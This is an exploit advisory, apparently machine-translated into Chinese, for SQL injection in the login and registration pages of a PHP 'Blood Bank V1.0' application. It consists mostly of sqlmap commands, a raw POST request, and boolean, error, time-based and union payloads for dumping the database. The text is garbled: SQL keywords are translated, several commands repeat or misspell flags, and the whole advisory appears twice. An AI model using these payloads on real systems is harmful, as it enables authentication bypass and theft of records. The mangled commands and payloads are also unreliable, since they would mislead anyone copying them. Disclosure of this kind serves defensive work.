#利用标题:血库V1.0 SQL注入漏洞
#日期: 2023-11-14
#利用作者: Ersin Erenler
#供应商homepage3360 https://code-projects.org/blood-bank-in-php-with-with-source-code
#软件link: https://download-media.code-project...n_in_php_with_with_source_source_code.zip.zip
#版本: 1.0
#在: Windows/Linux,Apache 2.4.54,PHP 8.2.0测试
#CVE : CVE-2023-46014,CVE-2023-46017,CVE-2023-46018
----------------------------------------------------------------------------------------------------------------------------
1。描述:
缺乏对“ Hemail”和“ Hpassword”参数的适当输入验证和消毒,允许攻击者制作SQL注入查询,绕过身份验证机制并获得对数据库的未经授权访问。
脆弱的文件: /hospitallogin.php
参数名称: HEMAIL,HAPSWORD
2。概念证明:
--------------------------------------
使用“ hemain”或“ hpassword”参数执行SQLMAP来检索当前数据库:
sqlmap -u 'http://localhost/bloodbank/file/hospitalLogin.php' --method POST --data 'hemail=test@testpassword=testlogin=Login' -p hemail --risk 3 --level 3 --dbms mysql --batch --current-db
SQLMAP响应:
--------------------------------------
参数: Hemail(邮政)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句(子查询- 评论)
payload: hemail=test@test'和3778=(select(case(3778=3778),然后3778 else(选择9754 Union Select 4153)End End))------------------
type:基于错误的
title: mysql=5.0或基于错误的- 在哪里,订购,按子句(floor)
有效载荷: HEMAIL=test@test'或(从(选择3342)(选择count(*),concat(0x716a7a6b71) nsquhpassword=testLogin=登录
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: HEMAIL=test@test'和(从(Select(Sleep(5)))ULGW)-Qynbhpassword=testLogin=login
type:联合查询
title:通用联盟查询(NULL)-6列
payload: hemail=test@test'联盟全部选择concat(0x716a7a6b71,0x567a4f6f4b5569767676766869687875454f48514d6e634242424a706f707141414e62684 F504A7A565178736A,0x7170767a71),null,Null,Null,Null,Null,Null,Null,Null ------ HPassword=testLogin=login
----------------------------------------------------------------------------------------------------------------------------
1。描述:
缺乏对“ Remail”和“ Rpassword”参数的适当输入验证和消毒,允许攻击者制作SQL注入查询,绕过身份验证机制并获得对数据库的未经授权访问
脆弱的File: /Receiverlogin.php
参数名称: REMAIL,RPASSWORD
2。概念证明:
--------------------------------------
使用“ remail”或“ rpassword”参数执行SQLMAP来检索当前数据库:
sqlmap -u'http://localhost/floodbank/file/receiverLogin.php' - method post -data'remail'remail'test@testrpassword=testrpassword=testrlogin=testrlogin=login'-p remail'-p remail -lisk 3 - level 5 -dbms myssql -batch -batch -batch -batch -batch -current -batch -current -batch -current -db -current -db -current -db -batch -current -db
sqlmap -u'http://localhost/bloodbank/file/file/hospitallogin.php' - method post -data'hemail'hemail'hemail=test@testpassword=testlogin=testlogin=login'login'-p rassword -lisk 3 - lib striisk 3 - level 5 -dbms myssql -batch -batch -batch -batch -batch -batch -batch -current -current -current -current db -current -current -current -db db
SQLMAP响应:
--------------------------------------
---
参数:回复(帖子)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句(子查询- 评论)
payload: remail=test@test'和1348=(选择(select(case(1348=1348)),然后1348 else(选择5898 UNION SELECT 1310)END))--- rpassword=testrlogin=login
type:基于错误的
title: mysql=5.0或基于错误的- 在哪里,订购,按子句(floor)
有效载荷: remail=test@test'或(从(选择9644)(选择Count(*),concat(0x717070717171) hyehrpassword=testrlogin=登录
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload:回复=test@test'和(从(选择(select(5)))hwqj)-nufnrpassword=testrlogin=login
type:联合查询
title:通用联盟查询(null)-7列
payload: remail=test@test'联合全部选择NULL,CONCAT(0x7170707171,0x4E764E5452452486270544A6E6E6E4C705A795A795A667441756D5556B416B416E7961484A 534a647542597a61466f,0x7178706271),null,null,null,null,null,null,null --- rpassword=testrlogin=login
---
---
参数: RPassword(POST)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句(子查询- 评论)
payload: remail=test@testrpassword=test'and 9149=(select(select(case(9149=9149)),然后9149 else(选择9028 UNION SELECT 5274)END)--- rlogin=login=login
type:基于错误的
title: mysql=5.0或基于错误的- 在哪里,订购,按子句(floor)
PAYLOAD: REMAIL=test@testrpassword=test'或(从(选择Count(*)选择6087,Concat(0x717170707171)(0x7170707171 VRQWRLOGIN=登录
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload:回复=test@testrpassword=test'and(从(select(select(5)))eegb) - cuoyrlogin=login
type:联合查询
title:通用联盟查询(null)-7列
payload: remail=test@testrpassword=test'联合全部选择NULL,CONCAT(0x7170707171,0x6e686d7763767676706f477996d474a74a74a736a485666f72625a4e6d537 247665a4444f684154684b476d62,0x7178706271),null,null,null,null,null,null,null,null --- rlogin=login
---
----------------------------------------------------------------------------------------------------------------------------
#Description:
在“划分”参数上缺乏适当的输入验证和消毒,攻击者可以制作SQL注入查询,绕过身份验证机制并获得对数据库的未经授权访问。
脆弱的file: /receiverreg.php
参数名称:回复
#概念证明:
--------------------------------------
1。将receiverReg.php的帖子请求保存到request.txt文件
---
post/bloodbank/file/receiverreg.php http/1.1
HOST: LOCALHOST
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)gecko/20100101 Firefox/119.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:多部分/form-data;边界=---------------------------------- 2653697510272605730288393868
内容长度: 877
Origin: http://localhost
连接:关闭
Referer: http://localhost/Bloodbank/register.php
cookie: phpsessid=某些cookie-value
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data;名称='rname'
测试
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data;名称='rbg'
A+
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data;名称='rcity'
测试
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data;名称='rphone'
05555555555555555
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data;名称='remail'
测试@测试
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data; name='rpassword'
Test123
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data;名称='rregister'
登记
-------------------------------------- 2653697510272605730288393868-
---
2。使用“ remail”参数执行SQLMAP来检索当前数据库:
sqlmap -r request.txt -p回复- 风险3-级别3 - dbms mysql -batch -current -db
#日期: 2023-11-14
#利用作者: Ersin Erenler
#供应商homepage3360 https://code-projects.org/blood-bank-in-php-with-with-source-code
#软件link: https://download-media.code-project...n_in_php_with_with_source_source_code.zip.zip
#版本: 1.0
#在: Windows/Linux,Apache 2.4.54,PHP 8.2.0测试
#CVE : CVE-2023-46014,CVE-2023-46017,CVE-2023-46018
----------------------------------------------------------------------------------------------------------------------------
1。描述:
缺乏对“ Hemail”和“ Hpassword”参数的适当输入验证和消毒,允许攻击者制作SQL注入查询,绕过身份验证机制并获得对数据库的未经授权访问。
脆弱的文件: /hospitallogin.php
参数名称: HEMAIL,HAPSWORD
2。概念证明:
--------------------------------------
使用“ hemain”或“ hpassword”参数执行SQLMAP来检索当前数据库:
sqlmap -u 'http://localhost/bloodbank/file/hospitalLogin.php' --method POST --data 'hemail=test@testpassword=testlogin=Login' -p hemail --risk 3 --level 3 --dbms mysql --batch --current-db
SQLMAP响应:
--------------------------------------
参数: Hemail(邮政)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句(子查询- 评论)
payload: hemail=test@test'和3778=(select(case(3778=3778),然后3778 else(选择9754 Union Select 4153)End End))------------------
type:基于错误的
title: mysql=5.0或基于错误的- 在哪里,订购,按子句(floor)
有效载荷: HEMAIL=test@test'或(从(选择3342)(选择count(*),concat(0x716a7a6b71) nsquhpassword=testLogin=登录
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: HEMAIL=test@test'和(从(Select(Sleep(5)))ULGW)-Qynbhpassword=testLogin=login
type:联合查询
title:通用联盟查询(NULL)-6列
payload: hemail=test@test'联盟全部选择concat(0x716a7a6b71,0x567a4f6f4b5569767676766869687875454f48514d6e634242424a706f707141414e62684 F504A7A565178736A,0x7170767a71),null,Null,Null,Null,Null,Null,Null,Null ------ HPassword=testLogin=login
----------------------------------------------------------------------------------------------------------------------------
1。描述:
缺乏对“ Remail”和“ Rpassword”参数的适当输入验证和消毒,允许攻击者制作SQL注入查询,绕过身份验证机制并获得对数据库的未经授权访问
脆弱的File: /Receiverlogin.php
参数名称: REMAIL,RPASSWORD
2。概念证明:
--------------------------------------
使用“ remail”或“ rpassword”参数执行SQLMAP来检索当前数据库:
sqlmap -u'http://localhost/floodbank/file/receiverLogin.php' - method post -data'remail'remail'test@testrpassword=testrpassword=testrlogin=testrlogin=login'-p remail'-p remail -lisk 3 - level 5 -dbms myssql -batch -batch -batch -batch -batch -current -batch -current -batch -current -db -current -db -current -db -batch -current -db
sqlmap -u'http://localhost/bloodbank/file/file/hospitallogin.php' - method post -data'hemail'hemail'hemail=test@testpassword=testlogin=testlogin=login'login'-p rassword -lisk 3 - lib striisk 3 - level 5 -dbms myssql -batch -batch -batch -batch -batch -batch -batch -current -current -current -current db -current -current -current -db db
SQLMAP响应:
--------------------------------------
---
参数:回复(帖子)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句(子查询- 评论)
payload: remail=test@test'和1348=(选择(select(case(1348=1348)),然后1348 else(选择5898 UNION SELECT 1310)END))--- rpassword=testrlogin=login
type:基于错误的
title: mysql=5.0或基于错误的- 在哪里,订购,按子句(floor)
有效载荷: remail=test@test'或(从(选择9644)(选择Count(*),concat(0x717070717171) hyehrpassword=testrlogin=登录
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload:回复=test@test'和(从(选择(select(5)))hwqj)-nufnrpassword=testrlogin=login
type:联合查询
title:通用联盟查询(null)-7列
payload: remail=test@test'联合全部选择NULL,CONCAT(0x7170707171,0x4E764E5452452486270544A6E6E6E4C705A795A795A667441756D5556B416B416E7961484A 534a647542597a61466f,0x7178706271),null,null,null,null,null,null,null --- rpassword=testrlogin=login
---
---
参数: RPassword(POST)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句(子查询- 评论)
payload: remail=test@testrpassword=test'and 9149=(select(select(case(9149=9149)),然后9149 else(选择9028 UNION SELECT 5274)END)--- rlogin=login=login
type:基于错误的
title: mysql=5.0或基于错误的- 在哪里,订购,按子句(floor)
PAYLOAD: REMAIL=test@testrpassword=test'或(从(选择Count(*)选择6087,Concat(0x717170707171)(0x7170707171 VRQWRLOGIN=登录
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload:回复=test@testrpassword=test'and(从(select(select(5)))eegb) - cuoyrlogin=login
type:联合查询
title:通用联盟查询(null)-7列
payload: remail=test@testrpassword=test'联合全部选择NULL,CONCAT(0x7170707171,0x6e686d7763767676706f477996d474a74a74a736a485666f72625a4e6d537 247665a4444f684154684b476d62,0x7178706271),null,null,null,null,null,null,null,null --- rlogin=login
---
----------------------------------------------------------------------------------------------------------------------------
#Description:
在“划分”参数上缺乏适当的输入验证和消毒,攻击者可以制作SQL注入查询,绕过身份验证机制并获得对数据库的未经授权访问。
脆弱的file: /receiverreg.php
参数名称:回复
#概念证明:
--------------------------------------
1。将receiverReg.php的帖子请求保存到request.txt文件
---
post/bloodbank/file/receiverreg.php http/1.1
HOST: LOCALHOST
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)gecko/20100101 Firefox/119.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:多部分/form-data;边界=---------------------------------- 2653697510272605730288393868
内容长度: 877
Origin: http://localhost
连接:关闭
Referer: http://localhost/Bloodbank/register.php
cookie: phpsessid=某些cookie-value
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data;名称='rname'
测试
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data;名称='rbg'
A+
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data;名称='rcity'
测试
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data;名称='rphone'
05555555555555555
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data;名称='remail'
测试@测试
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data; name='rpassword'
Test123
-------------------------------------- 2653697510272605730288393868
content-disposition: form-data;名称='rregister'
登记
-------------------------------------- 2653697510272605730288393868-
---
2。使用“ remail”参数执行SQLMAP来检索当前数据库:
sqlmap -r request.txt -p回复- 风险3-级别3 - dbms mysql -batch -current -db